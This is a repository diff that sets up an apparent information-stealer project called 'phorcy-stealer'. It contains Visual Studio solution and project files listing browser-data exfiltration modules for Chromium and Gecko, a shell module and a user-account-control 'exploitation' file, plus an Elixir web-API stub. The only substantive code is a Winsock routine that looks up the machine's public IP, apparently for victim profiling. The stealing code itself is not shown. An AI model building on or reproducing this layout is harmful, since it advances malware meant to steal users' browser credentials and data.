+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:10:34.306Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 10,
+              "Title": "chromium.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\chromium.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:10:29.995Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 11,
+              "Title": "gecko.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\gecko.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:10:25.787Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 12,
+              "Title": "browser.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\browser.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\browser.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:10:18.141Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 13,
+              "Title": "browser.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\browser.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\browser.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:10:10.643Z",
+              "EditorCaption": ""
+            }
+          ]
+        }
+      ]
+    }
+  ]
+}

main/port/payload/phorcy/phorcy-master.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36221.1 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "phorcy-master", "phorcy-master\phorcy-master.vcxproj", "{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x64.ActiveCfg = Debug|x64
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x64.Build.0 = Debug|x64
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x86.ActiveCfg = Debug|Win32
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Debug|x86.Build.0 = Debug|Win32
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x64.ActiveCfg = Release|x64
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x64.Build.0 = Release|x64
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x86.ActiveCfg = Release|Win32
+		{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {7C62B06E-06EB-443A-A531-F6E5670C8F49}
+	EndGlobalSection
+EndGlobal

main/port/payload/phorcy/phorcy-master/anti_dbg/win/exploitation/conf.h

@@ -0,0 +1 @@
+#pragma once

main/port/payload/phorcy/phorcy-master/anti_dbg/win/exploitation/exploitation.h

@@ -0,0 +1 @@
+#pragma once

main/port/payload/phorcy/phorcy-master/include.h

@@ -0,0 +1 @@
+#pragma once

main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj

@@ -0,0 +1,153 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="anti_dbg\win\exploitation\user_account_control.cpp" />
+    <ClCompile Include="conf.cpp" />
+    <ClCompile Include="conn.cpp" />
+    <ClCompile Include="main.cpp" />
+    <ClCompile Include="windows\exfil\browser\browser.cpp" />
+    <ClCompile Include="windows\exfil\browser\chromium.cpp" />
+    <ClCompile Include="windows\exfil\browser\gecko.cpp" />
+    <ClCompile Include="windows\exfil\browser\shell\shell.cpp" />
+    <ClCompile Include="windows\exfil\utils\ip.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="anti_dbg\win\exploitation\conf.h" />
+    <ClInclude Include="anti_dbg\win\exploitation\exploitation.h" />
+    <ClInclude Include="include.h" />
+    <ClInclude Include="windows\exfil\browser\browser.h" />
+    <ClInclude Include="windows\exfil\browser\shell\shell.h" />
+    <ClInclude Include="windows\exfil\utils\utils.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <Library Include="connection\cryptography\threefish512.lib" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="connection\cryptography\main.dll" />
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{f9dfc7ae-c751-420a-ad18-c4d059c1f0b2}</ProjectGuid>
+    <RootNamespace>phorcy-master</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj.filters

@@ -0,0 +1,72 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="main.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="conn.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="conf.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windows\exfil\browser\browser.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windows\exfil\browser\gecko.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windows\exfil\browser\chromium.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windows\exfil\browser\shell\shell.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="anti_dbg\win\exploitation\user_account_control.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="windows\exfil\utils\ip.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="windows\exfil\browser\browser.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="windows\exfil\browser\shell\shell.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="anti_dbg\win\exploitation\exploitation.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="include.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="anti_dbg\win\exploitation\conf.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="windows\exfil\utils\utils.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <Library Include="connection\cryptography\threefish512.lib" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="connection\cryptography\main.dll" />
+  </ItemGroup>
+</Project>

main/port/payload/phorcy/phorcy-master/phorcy-master.vcxproj.user

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <ShowAllFiles>true</ShowAllFiles>
+  </PropertyGroup>
+</Project>

main/port/payload/phorcy/phorcy-master/windows/exfil/browser/browser.h

@@ -0,0 +1 @@
+#pragma once

main/port/payload/phorcy/phorcy-master/windows/exfil/browser/shell/shell.h

@@ -0,0 +1 @@
+#pragma once

main/port/payload/phorcy/phorcy-master/windows/exfil/utils/ip.cpp

@@ -0,0 +1,105 @@
+#include <iostream>
+#include <string>
+#include <winsock2.h>
+#include <ws2tcpip.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+namespace Utils {
+
+    DWORD GetIPAddr(std::string& ip_addr) {
+        // 1. Initialize Winsock
+        WSADATA wsaData;
+        if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+            return 0;
+        }
+
+        // 2. Resolve the server address
+        struct addrinfo* result = NULL, hints;
+        const char* hostname = "api.ipify.org";
+        const char* path = "/";
+
+        ZeroMemory(&hints, sizeof(hints));
+        hints.ai_family = AF_UNSPEC;
+        hints.ai_socktype = SOCK_STREAM;
+        hints.ai_protocol = IPPROTO_TCP;
+
+        if (getaddrinfo(hostname, "80", &hints, &result) != 0) {
+            WSACleanup();
+            return 0;
+        }
+
+        // 3. Connect to the server
+        SOCKET ConnectSocket = INVALID_SOCKET;
+        struct addrinfo* ptr = NULL;
+
+        for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
+            ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
+            if (ConnectSocket == INVALID_SOCKET) {
+                WSACleanup();
+                return 0;
+            }
+
+            if (connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen) == SOCKET_ERROR) {
+                closesocket(ConnectSocket);
+                ConnectSocket = INVALID_SOCKET;
+                continue;
+            }
+            break;
+        }
+
+        freeaddrinfo(result);
+
+        if (ConnectSocket == INVALID_SOCKET) {
+            WSACleanup();
+            return 0;
+        }
+
+        // 4. Send HTTP GET request
+        std::string request = "GET " + std::string(path) + " HTTP/1.1\r\n"
+            "Host: " + std::string(hostname) + "\r\n"
+            "User-Agent: CppWinsockClient/1.0\r\n"
+            "Connection: close\r\n\r\n";
+
+        if (send(ConnectSocket, request.c_str(), (int)request.length(), 0) == SOCKET_ERROR) {
+            closesocket(ConnectSocket);
+            WSACleanup();
+            return 0;
+        }
+
+        // 5. Receive the response
+        char recvbuf[4096];
+        int iResult;
+        std::string responseData;
+
+        do {
+            iResult = recv(ConnectSocket, recvbuf, sizeof(recvbuf) - 1, 0);
+            if (iResult > 0) {
+                recvbuf[iResult] = '\0';
+                responseData += recvbuf;
+            }
+        } while (iResult > 0);
+
+        // 6. Extract and print ONLY the IP (Body)
+        // The body is separated from headers by a double newline "\r\n\r\n"
+        size_t headerEnd = responseData.find("\r\n\r\n");
+        if (headerEnd != std::string::npos) {
+            std::string ip = responseData.substr(headerEnd + 4);
+            ip_addr = ip;
+            //std::cout << ip << std::endl;
+        }
+        else {
+            //std::cerr << "Invalid response format" << std::endl;
+            closesocket(ConnectSocket);
+            WSACleanup();
+            return 0;
+        }
+
+        // 7. Cleanup
+        closesocket(ConnectSocket);
+        WSACleanup();
+        return 1;
+    }
+
+
+}

main/port/payload/phorcy/phorcy-master/windows/exfil/utils/utils.h

@@ -0,0 +1 @@
+#pragma once

web-api/phorcy_api_ex/.formatter.exs

@@ -0,0 +1,4 @@
+# Used by "mix format"
+[
+  inputs: ["{mix,.formatter}.exs", "{config,lib,test}/**/*.{ex,exs}"]
+]

web-api/phorcy_api_ex/.gitignore

@@ -0,0 +1,24 @@
+# The directory Mix will write compiled artifacts to.
+/_build/
+
+# If you run "mix test --cover", coverage assets end up here.
+/cover/
+
+# The directory Mix downloads your dependencies sources to.
+/deps/
+
+# Where third-party dependencies like ExDoc output generated docs.
+/doc/
+
+# Temporary files, for example, from tests.
+/tmp/
+
+# If the VM crashes, it generates a dump, let's ignore it too.
+erl_crash.dump
+
+# Also ignore archive artifacts (built via "mix archive.build").
+*.ez
+
+# Ignore package tarball (built via "mix hex.build").
+phorcy_api_ex-*.tar
+

web-api/phorcy_api_ex/README.md

@@ -0,0 +1,21 @@
+# PhorcyApiEx
+
+**TODO: Add description**
+
+## Installation
+
+If [available in Hex](https://hex.pm/docs/publish), the package can be installed
+by adding `phorcy_api_ex` to your list of dependencies in `mix.exs`:
+
+```elixir
+def deps do
+  [
+    {:phorcy_api_ex, "~> 0.1.0"}
+  ]
+end
+```
+
+Documentation can be generated with [ExDoc](https://github.com/elixir-lang/ex_doc)
+and published on [HexDocs](https://hexdocs.pm). Once published, the docs can
+be found at <https://hexdocs.pm/phorcy_api_ex>.
+

web-api/phorcy_api_ex/lib/phorcy_api_ex.ex

@@ -0,0 +1,18 @@
+defmodule PhorcyApiEx do
+  @moduledoc """
+  Documentation for `PhorcyApiEx`.
+  """
+
+  @doc """
+  Hello world.
+
+  ## Examples
+
+      iex> PhorcyApiEx.hello()
+      :world
+
+  """
+  def hello do
+    :world
+  end
+end

web-api/phorcy_api_ex/mix.exs

@@ -0,0 +1,28 @@
+defmodule PhorcyApiEx.MixProject do
+  use Mix.Project
+
+  def project do
+    [
+      app: :phorcy_api_ex,
+      version: "0.1.0",
+      elixir: "~> 1.19",
+      start_permanent: Mix.env() == :prod,
+      deps: deps()
+    ]
+  end
+
+  # Run "mix help compile.app" to learn about applications.
+  def application do
+    [
+      extra_applications: [:logger]
+    ]
+  end
+
+  # Run "mix help deps" to learn about dependencies.
+  defp deps do
+    [
+      # {:dep_from_hexpm, "~> 0.3.0"},
+      # {:dep_from_git, git: "https://github.com/elixir-lang/my_dep.git", tag: "0.1.0"}
+    ]
+  end
+end

web-api/phorcy_api_ex/test/phorcy_api_ex_test.exs

@@ -0,0 +1,8 @@
+defmodule PhorcyApiExTest do
+  use ExUnit.Case
+  doctest PhorcyApiEx
+
+  test "greets the world" do
+    assert PhorcyApiEx.hello() == :world
+  end
+end

web-api/phorcy_api_ex/test/test_helper.exs

@@ -0,0 +1 @@
+ExUnit.start()